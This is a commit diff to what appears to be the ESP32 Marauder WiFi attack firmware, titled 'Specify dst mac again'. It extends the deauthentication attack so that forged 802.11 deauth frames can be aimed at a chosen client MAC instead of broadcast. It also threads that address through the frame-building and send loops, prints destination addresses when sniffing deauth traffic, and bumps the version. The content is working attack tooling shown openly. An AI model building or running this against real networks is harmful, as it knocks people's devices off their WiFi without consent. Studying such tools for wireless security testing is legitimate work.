Specify dst mac again

esp32_marauder/CommandLine.cpp

@@ -345,6 +345,14 @@ void CommandLine::runCommand(String input) {
         // Branch on attack type
         // Deauth
         if (attack_type == ATTACK_TYPE_DEAUTH) {
+          if (dst_addr_sw == -1) {
+            Serial.println("Sending to broadcast...");
+            wifi_scan_obj.dst_mac = "ff:ff:ff:ff:ff:ff";
+          }
+          else {
+            wifi_scan_obj.dst_mac = cmd_args.get(dst_addr_sw + 1);
+            Serial.println("Sending to " + wifi_scan_obj.dst_mac + "...");
+          }
           if (src_addr_sw == -1) {
             if (!this->apSelected()) {
               Serial.println("You don't have any targets selected. Use " + (String)SEL_CMD);

esp32_marauder/CommandLine.h

@@ -87,7 +87,7 @@ const char PROGMEM HELP_SNIFF_PMKID_CMD[] = "sniffpmkid [-c <channel>]";
 const char PROGMEM HELP_STOPSCAN_CMD[] = "stopscan";
 
 // WiFi attack
-const char PROGMEM HELP_ATTACK_CMD[] = "attack -t <beacon [-l/-r/-a]/deauth [-s <src mac>]/probe/rickroll>";
+const char PROGMEM HELP_ATTACK_CMD[] = "attack -t <beacon [-l/-r/-a]/deauth [-s <src mac>] [-d <dst mac>]/probe/rickroll>";
 
 // WiFi Aux
 const char PROGMEM HELP_LIST_AP_CMD_A[] = "list -s";

esp32_marauder/WiFiScan.cpp

@@ -372,6 +372,8 @@ bool WiFiScan::shutdownWiFi() {
     esp_wifi_set_promiscuous(false);
     WiFi.disconnect();
     WiFi.mode(WIFI_OFF);
+
+    dst_mac = "ff:ff:ff:ff:ff:ff";
   
     esp_wifi_set_mode(WIFI_MODE_NULL);
     esp_wifi_stop();
@@ -1887,8 +1889,12 @@ void WiFiScan::deauthSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type
       Serial.print(snifferPacket->rx_ctrl.channel);
       Serial.print(" BSSID: ");
       char addr[] = "00:00:00:00:00:00";
+      char dst_addr[] = "00:00:00:00:00:00";
       getMAC(addr, snifferPacket->payload, 10);
+      getMAC(dst_addr, snifferPacket->payload, 4);
       Serial.print(addr);
+      Serial.print(" -> ");
+      Serial.print(dst_addr);
       display_string.concat(text_table4[0]);
       display_string.concat(snifferPacket->rx_ctrl.rssi);
 
@@ -2364,7 +2370,7 @@ void WiFiScan::sendProbeAttack(uint32_t currentTime) {
   }
 }
 
-void WiFiScan::sendDeauthFrame(uint8_t bssid[6], int channel) {
+void WiFiScan::sendDeauthFrame(uint8_t bssid[6], int channel, String dst_mac_str) {
   // Itterate through all access points in list
   // Check if active
   WiFiScan::set_channel = channel;
@@ -2372,6 +2378,9 @@ void WiFiScan::sendDeauthFrame(uint8_t bssid[6], int channel) {
   delay(1);
   
   // Build packet
+
+  sscanf(dst_mac_str.c_str(), "%2hhx:%2hhx:%2hhx:%2hhx:%2hhx:%2hhx", 
+        &deauth_frame_default[4], &deauth_frame_default[5], &deauth_frame_default[6], &deauth_frame_default[7], &deauth_frame_default[8], &deauth_frame_default[9]);
   
   deauth_frame_default[10] = bssid[0];
   deauth_frame_default[11] = bssid[1];
@@ -2395,7 +2404,7 @@ void WiFiScan::sendDeauthFrame(uint8_t bssid[6], int channel) {
   packets_sent = packets_sent + 3;
 }
 
-void WiFiScan::sendDeauthAttack(uint32_t currentTime) {
+void WiFiScan::sendDeauthAttack(uint32_t currentTime, String dst_mac_str) {
   // Itterate through all access points in list
   for (int i = 0; i < access_points->size(); i++) {
 
@@ -2406,6 +2415,9 @@ void WiFiScan::sendDeauthAttack(uint32_t currentTime) {
       delay(1);
       
       // Build packet
+
+      sscanf(dst_mac_str.c_str(), "%2hhx:%2hhx:%2hhx:%2hhx:%2hhx:%2hhx", 
+            &deauth_frame_default[4], &deauth_frame_default[5], &deauth_frame_default[6], &deauth_frame_default[7], &deauth_frame_default[8], &deauth_frame_default[9]);
       
       deauth_frame_default[10] = access_points->get(i).bssid[0];
       deauth_frame_default[11] = access_points->get(i).bssid[1];
@@ -3189,7 +3201,7 @@ void WiFiScan::main(uint32_t currentTime)
   }
   else if (currentScanMode == WIFI_ATTACK_DEAUTH) {
     for (int i = 0; i < 55; i++)
-      this->sendDeauthAttack(currentTime);
+      this->sendDeauthAttack(currentTime, this->dst_mac);
 
     if (currentTime - initTime >= 1000) {
       initTime = millis();
@@ -3209,7 +3221,7 @@ void WiFiScan::main(uint32_t currentTime)
   }
   else if (currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) {
     for (int i = 0; i < 55; i++)
-      this->sendDeauthFrame(this->src_mac, this->set_channel);
+      this->sendDeauthFrame(this->src_mac, this->set_channel, this->dst_mac);
 
     if (currentTime - initTime >= 1000) {
       initTime = millis();

esp32_marauder/WiFiScan.h

@@ -235,8 +235,8 @@ class WiFiScan
     void tftDrawColorKey();
     void tftDrawGraphObjects();
     void sendProbeAttack(uint32_t currentTime);
-    void sendDeauthAttack(uint32_t currentTime);
-    void sendDeauthFrame(uint8_t bssid[6], int channel);
+    void sendDeauthAttack(uint32_t currentTime, String dst_mac_str = "ff:ff:ff:ff:ff:ff");
+    void sendDeauthFrame(uint8_t bssid[6], int channel, String dst_mac_str = "ff:ff:ff:ff:ff:ff");
     void broadcastRandomSSID(uint32_t currentTime);
     void broadcastCustomBeacon(uint32_t current_time, ssid custom_ssid);
     void broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid);
@@ -283,7 +283,7 @@ class WiFiScan
     String old_free_ram = "";
     String connected_network = "";
 
-    byte dst_mac[6] = {};
+    String dst_mac = "ff:ff:ff:ff:ff:ff";
     byte src_mac[6] = {};
 
     //lv_obj_t * scr = lv_cont_create(NULL, NULL);

esp32_marauder/configs.h

@@ -4,14 +4,14 @@
 
   #define POLISH_POTATO
   
-  //#define MARAUDER_MINI
+  #define MARAUDER_MINI
   //#define MARAUDER_V4
   //#define MARAUDER_V6
   //#define MARAUDER_KIT
   //#define GENERIC_ESP32
-  #define MARAUDER_FLIPPER
+  //#define MARAUDER_FLIPPER
 
-  #define MARAUDER_VERSION "v0.9.16"
+  #define MARAUDER_VERSION "v0.9.17"
 
   //// BUTTON DEFINITIONS
   #ifdef MARAUDER_MINI